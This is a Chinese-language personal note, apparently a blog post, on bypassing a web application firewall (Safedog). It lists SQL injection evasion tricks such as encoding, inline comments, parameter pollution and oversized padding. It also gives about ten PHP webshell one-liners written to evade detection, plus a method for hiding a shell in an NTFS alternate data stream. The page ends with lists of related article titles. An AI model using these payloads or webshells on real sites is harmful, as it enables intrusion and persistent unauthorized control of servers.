注意：仅用于本人学习的笔记记录，禁止进行传播分享，一旦造成严重后果与本人无关！！！

WAF：

web应用防护系统（网站应用级防御系统）

waf会拦截恶意传参，但并不是所有的拦截都是waf干的

硬件waf、软件waf、云waf

WAF检测机制的核心就是正则表达式

测试环境

系统：win2008R2

最新版安全狗：

一、常见绕WAF手法

Bypass  SQL

1、大小写绕过（很老的waf才有用）

2、替换绕过

3、特殊字符绕过（%0a换行）        \sleep()        \updataxml()

4、编码绕过（利用检测机制的不同，通过编码绕过）

5、等价替换（利用其他函数替换

注释        /**/        数据库中是注释的意思

内联注释        /*!5001*/        当数据库版本大于5001执行

6、容器特征（apche的hpp、或者是iis的%分割）

iis传参里面 s%e%l%e%c%t   =>  select

apche参数污染，传两个参数，以后一个参数为准

id=phpinfo() /*&id=1 and 1=2-- qwe*/

7、白名单（管理员权限或者是127.0.0.1本地不拦截、文件后缀名）

8、缓冲区（数据太多超过waf检测范围）

安全狗一般检测4000个

?id= 1 /* ...... */ union select 1,2,3,4

二、绕WAF写码

Bypass  webshell

1、<?php eval($_REQUEST[8]);?>        非常的难以置信，这个竟然没有拦截

2、<?php eval(end($_REQUEST));?>

3、<?php define("a","$_REQUEST");eval(a)?>

4、变量覆盖绕过

<?php          $a="ev";       $b="al";       $c=$a$b;       $d="c";

$$d($_REQUEST[8]);        ?>

5、函数绕过

<?php funcation a($a,$b){return $a.$b;} eval(a("$_REQ","UEST")[8])?>

6、魔术方法绕过

<?php   class User{public $name;public function  __destruct(){ eval("$this->name");  }   }$user = new User();  $user->name="$_REQUEST[8]";
?>

7、类方法绕过

<?php  $COOKIE=$_COOKIE;

foreach($COOKIE  as   $key=> $value){

if($key=='eval'){

$key($REQUEST[8])

}

}?>

8、内置函数

<?php

$a=get_defined_functions();

$a[internal][841]($_REQUEST[1])

?>

9、绕WAF终极手法，连接外部数据库hjw，获取info表中的第一行数据eval($_REQUEST[8])

<?php

eval(mysqli_fetch_assoc(mysqli_query(mysql_connect('127.0.0.1','root','root','hjw123'),'select * from info'))['info'])        //键为info的地方

?>

10、拿到shell之后藏shell的妙招ntf文件流

一、echo "<?php  eval($_REQUEST[8])?>"  >>  /:123.txt

二、<?php include('/:123.txt')?>

bypass绕WAF相关推荐

1. 如何跟踪log4j漏洞原理及发现绕WAF的tips

   log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips 跟进漏洞产生原因的思路 如何发现漏洞产生原因的 了解到log4j ...

2. 43_sql注入绕waf

   sql注入绕waf 一.搭建安全狗 参考文章 https://www.cnblogs.com/zhaoyunxiang/archive/2021/09/27/15342257.html 搭建之后,通过 ...

3. Java文件上传大杀器-绕waf(针对commons-fileupload组件)

   Java文件上传大杀器-绕waf(针对commons-fileupload组件) Ps:高版本才有1.3以上 来个中二的标题,哈哈哈,灵感来源于昨晚赛博群有个师傅@我是killer发了篇新文章,在那篇 ...

4. 一句话木马绕WAF（小宇特详解）

   webshell绕过WAF 常见的PHP一句话木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先 ...

5. WAF自动化Fuzz工具-WAFNinja（绕WAF、绕过WAF）

   目录 前言 简介 下载安装 下载方式: 安装 使用 查看帮助信息 使用示例 参数介绍 前言 在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡.这时一款良好的绕过WAF的渗透测试工具就显得很受渗透 ...

6. tamper绕WAF小结

   sqlmap有一些非常好的脚本,在如下的地址中你能够发现它们.使用svn检查 https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 事实上,脚本的 ...

7. salmap绕waf

   2019独角兽企业重金招聘Python工程师标准>>> 0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入 ...

8. 唯快不破的分块传输绕WAF

   某重保项目,需要进行渗透,找到突破口,拿起sqlmap一顿梭,奈何安全设备在疯狂运转,故祭起绕过注入的最强套路-分块传输绕过WAF进行SQL注入.安全人员当然安全第一,拿到渗透授权书,测试时间报备等操 ...

9. 记录一次Oracle注入绕waf

   这个注入挺特殊的,是ip头注入.我们进行简单的探测: 首先正常发起一次请求,我们发现content-type是76 探测注入我习惯性的一个单引号: 一个单引号我发现长度还是76 我开始尝试单引号,双引 ...

最新文章

1. 手撕代码之七大常用排序算法 | 附完整代码
2. 自动化测试现状趋势解读，附带近年自动化测试常用工具
3. 基于Hash算法的高维数据的最近邻检索
4. 移动端应用类型及特点
5. torch yolov3梯度发散
6. 「镁客早报」任正非称对苹果等对手出售5G芯片持开放态度；马斯克称未来12个月内将生产超过50万辆车...
7. 数学图形(1.42)拱形曲线
8. c++ 线程什么时候run_阿里后端Java面试题：启动线程是start()还是run()？为什么？...
9. 脚本启动显示查询频繁被服务器防御_面对CC攻击，该如何进行防御
10. 计算机硬盘修复教程,DiskGenius数据恢复教程 教你电脑硬盘数据如何恢复
11. bzoj 1664 （贪心）
12. zabbix 监控项-计算公式监控磁盘使用率
13. c语言岩石1ms,2017年注册岩土工程师基础考试真题下午和答案解析
14. Manjaro Linux安装QQ和微信
15. phpcms 下载数统计
16. UE4虚幻引擎4多人联机基础知识和客户端服务器通信机制详解
17. AVL树【图示详解+代码实现】
18. 使用html2canvas保存html或者div内容为图片及自定义名称
19. 用脉冲响应不变法设计IIR 滤波器 MATLAB实现
20. JS中的各种遍历方法

热门文章

1. HQChart使用教程67 - 鼠标点击K线柱子监听事件
2. 【GK101 谐波数据生成器】上位机软件升级（版本：1.1）
3. [原创]水知道答案吗？（一）
4. 读丘维声之《解析几何》
5. 如何防止ajax站外提交,ajax 防止用户反复提交的2种解决方案
6. “running install error: can‘t create or remove files in install directory The following error occu”
7. C++自增操作符你真的懂？
8. Vulkan Samples 阅读 -- Extensions（二）
9. 基于ESP8266上云实验
10. PTA 2-1 旅游规划（最短路径问题）简单floyd算法